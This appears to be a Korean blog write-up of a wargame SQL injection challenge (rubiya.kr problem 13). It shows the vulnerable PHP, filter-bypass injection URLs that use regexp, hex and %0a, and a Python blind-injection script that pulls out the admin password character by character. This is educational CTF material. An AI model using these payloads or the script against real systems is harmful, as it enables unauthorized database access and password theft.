http://rubiya.kr/sqli/prob13.php
<?php
include "./dbconn.php";
include "./solve.php";
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
$query = "select id from prob12 where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob12 where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve();
highlight_file(__FILE__);
?>
이전 문제와 똑같지만 =과 like까지 다 필터링되어있음. =과 like까지 막혀있으면 regexp로 우회.
그리고 or이 필터링되어있어서 ord도 못씀. ascii, ord가 막혀있으면 hex로 변환후 비교.
공백도 필터링되어있으므로 %0a같은걸로 우회.
http://rubiya.kr/sqli/prob13.php?pw=a&no=0%0a||%0ahex(right(left(id,1),1))%0aregexp%0a61
query : select id from prob12 where id='guest' and pw='a' and no=0 || hex(right(left(id,1),1)) regexp 61
제대로 출력되는거 확인. pw길이를 구하면
http://rubiya.kr/sqli/prob13.php?pw=a&no=0%0a||%0alength(pw)%0aregexp%0a8
query : select id from prob12 where id='guest' and pw='a' and no=0 || length(pw) regexp 8
길이를 구했으니 코드를 짜면.
import urllib,urllib2 # -*- coding: euc-kr -*- answer = '' a = ['{:x}'.format(i) for i in range(32,128)] #print a for i in range(1,9): for j in a: print j req = urllib2.Request('http://rubiya.kr/sqli/prob13.php?pw=a&no=0%0a||%0ahex(right(left(pw,'+str(i)+\ '),1))%0aregexp%0a'+str(j)+'%0a%26%26%0aid%0aregexp%0achar(97,100,109,105,110)') res = urllib2.urlopen(req) if res.read().find('Hello admin') != -1: print i,':',chr(int(j,16)) answer += chr(int(j,16)) break print answer
a = ['{:x}'.format(i) for i in range(32,128)] 관련 자료는 여기 참조
'webhacking > sql, sql injection' 카테고리의 다른 글
itchy (0) | 2014.08.29 |
---|---|
rubiya.kr 14번. (0) | 2014.08.28 |
rubiya.kr 12번. (0) | 2014.08.28 |
rubiya.kr 11번. (0) | 2014.08.28 |
rubiya.kr 10번. (0) | 2014.08.28 |